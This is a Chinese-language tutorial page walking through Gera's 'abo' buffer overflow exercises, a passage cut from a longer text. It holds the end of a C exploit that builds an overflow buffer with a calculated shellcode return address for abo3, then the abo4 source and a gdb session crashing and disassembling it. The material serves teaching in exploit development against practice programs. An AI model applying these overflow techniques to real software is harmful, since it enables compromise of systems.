📄 467.html
字号:
/* Calculating address of shellcode */<br />
int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo3");<br />
<br />
/* Constructing the buffer */<br />
p = evil_buffer;<br />
memset( p,'B',256); // Some junk<br />
p += 256;<br />
<br />
*((void **)p)=(void *)(ret);<br />
p +=4;<br />
* p='0';<br />
<br />
/* Two arguments are passed to vulnerable program */<br />
execle("/home/user/gera/abo3","abo3", evil_buffer,"A",NULL,env);<br />
}<br />
<br />
<br />
<br />
高级缓存区溢出代码4的分析<br />
源代码:<br />
/* abo4. c *<br />
* specially crafted to feed your brain by gera@core-sdi.com */<br />
<br />
/* After this one, the next is just an Eureka! away */<br />
<br />
extern system, puts;<br />
void (* fn)( char*)=( void(*)( char*))& system;<br />
<br />
int main( int argv, char ** argc) <br />
char * pbuf= malloc(strlen(argc[2])+1);<br />
char buf[256];<br />
<br />
fn=(void(*)(char*))& puts;<br />
strcpy(buf,argc[1]);<br />
strcpy(pbuf,argc[2]);<br />
fn(argc[3]);<br />
while(1);<br />
<br />
从攻击者的角度,这个程序跟前面那个没什么不同,其实fn()的地址已经不再分配在栈里了,因为它在main()函数之前声明,所以它的地址现在被分配在.data区里了。<br />
<br />
user@ CoreLabs:~/ gera$ gcc abo4. c - o abo4 - ggdb<br />
abo4. c: In function ` main':<br />
abo4. c: 10: warning: initialization makes pointer from integer without a<br />
cast<br />
user@ CoreLabs:~/ gera$ gdb ./ abo4<br />
GNU gdb 5.0<br />
Copyright 2000 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you<br />
arewelcome to change it and/ or distribute copies of it under certain<br />
conditions.<br />
Type " show copying" to see the conditions.<br />
There is absolutely no warranty for GDB. Type " show warranty" for details.<br />
This GDB was configured as " i386- slackware- linux"...<br />
( gdb) r ` perl - e ' printf " A" x 260'` BBBB CCCC<br />
Starting program: / home/ user/ gera/ abo4 ` perl - e ' printf " A" x 260'` BB CC<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
strcpy ( dest= 0x41414141 < Address 0x41414141 out of bounds>, src= 0xbffffb6e<br />
" BBBB") at ../ sysdeps/ generic/ strcpy. c: 40<br />
40 ../ sysdeps/ generic/ strcpy. c: No such file or directory.<br />
( gdb) disass main<br />
Dump of assembler code for function main:<br />
0x80484d0 < main>: push % ebp<br />
0x80484d1 < main+ 1>: mov % esp,% ebp<br />
0x80484d3 < main+ 3>: sub $ 0x114,% esp<br />
0x80484d9 < main+ 9>: push % ebx<br />
0x80484da < main+ 10>: add $ 0xfffffff4,% esp<br />
0x80484dd < main+ 13>: add $ 0xfffffff4,% esp<br />
<br />
0x80484e0 < main+ 16>: mov 0xc(% ebp),% eax<br />
0x80484e3 < main+ 19>: add $ 0x8,% eax<br />
0x80484e6 < main+ 22>: mov (% eax),% edx<br />
0x80484e8 < main+ 24>: push % edx<br />
0x80484e9 < main+ 25>: call 0x80483b4 < strlen><br />
0x80484ee < main+ 30>: add $ 0x10,% esp<br />
0x80484f1 < main+ 33>: mov % eax,% eax<br />
0x80484f3 < main+ 35>: lea 0x1(% eax),% edx<br />
0x80484f6 < main+ 38>: push % edx<br />
0x80484f7 < main+ 39>: call 0x8048394 < malloc><br />
0x80484fc < main+ 44>: add $ 0x10,% esp<br />
0x80484ff < main+ 47>: mov % eax,% eax<br />
0x8048501 < main+ 49>: mov % eax, 0xfffffffc(% ebp)<br />
0x8048504 < main+ 52>: movl $ 0x8048384,0x80495cc<br />
0x804850e < main+ 62>: add $ 0xfffffff8,% esp<br />
0x8048511 < main+ 65>: mov 0xc(% ebp),% eax<br />
0x8048514 < main+ 68>: add $ 0x4,% eax<br />
0x8048517 < main+ 71>: mov (% eax),% edx<br />
0x8048519 < main+ 73>: push % edx<br />
0x804851a < main+ 74>: lea 0xfffffefc(% ebp),% eax<br />
0x8048520 < main+ 80>: push % eax<br />
0x8048521 < main+ 81>: call 0x80483d4 < strcpy><br />
0x8048526 < main+ 86>: add $ 0x10,% esp<br />
0x8048529 < main+ 89>: add $ 0xfffffff8,% esp<br />
0x804852c < main+ 92>: mov 0xc(% ebp),% eax<br />
0x804852f < main+ 95>: add $ 0x8,% eax<br />
0x8048532 < main+ 98>: mov (% eax),% edx<br />
0x8048534 < main+ 100>: push % edx<br />
0x8048535 < main+ 101>: mov 0xfffffffc(% ebp),% eax<br />
0x8048538 < main+ 104>: push % eax<br />
0x8048539 < main+ 105>: call 0x80483d4 < strcpy><br />
0x804853e < main+ 110>: add $ 0x10,% esp<br />
0x8048541 < main+ 113>: add $ 0xfffffff4,% esp<br />
0x8048544 < main+ 116>: mov 0xc(% ebp),% eax<br />
0x8048547 < main+ 119>: add $ 0xc,% eax<br />
0x804854a < main+ 122>: mov (% eax),% edx<br />
0x804854c < main+ 124>: push % edx<br />
0x804854d < main+ 125>: mov 0x80495cc,% ebx<br />
0x8048553 < main+ 131>: call *% ebx<br />
0x8048555 < main+ 133>: add $ 0x10,% esp<br />
0x8048558 < main+ 136>: jmp 0x8048560 < main+ 144><br />
0x804855a < main+ 138>: jmp 0x8048562 < main+ 146><br />
0x804855c < main+ 140>: lea 0x0(% esi, 1),% esi<br />
0x8048560 < main+ 144>: jmp 0x8048558 < main+ 136><br />
0x8048562 < main+ 146>: mov 0xfffffee8(% ebp),% ebx<br />
0x8048568 < main+ 152>: leave<br />
0x8048569 < main+ 153>: ret<br />
End of assembler dump.<br />
( gdb) main inf sec<br />
Exec file: `/ home/ user/ gera/ abo4', file type elf32- i386.<br />
[ Some part of output was removed. It?ˉs not needed anyway]<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -